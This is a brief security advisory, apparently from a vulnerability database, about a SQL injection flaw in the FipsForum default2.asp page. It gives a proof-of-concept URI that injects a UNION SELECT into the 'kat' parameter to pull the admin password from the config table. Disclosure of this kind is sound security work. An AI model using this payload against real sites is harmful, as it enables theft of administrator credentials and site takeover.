FipsForum Default2.ASP SQL Injection Vulnerability

FipsForum Default2.ASP SQL Injection Vulnerability

An attacker can exploit these issues via a web client.

The following proof-of-concept URI is available:

http://www.example.com//default2.asp?kat=-1%20union%20select%200,pw_admin%20from%20config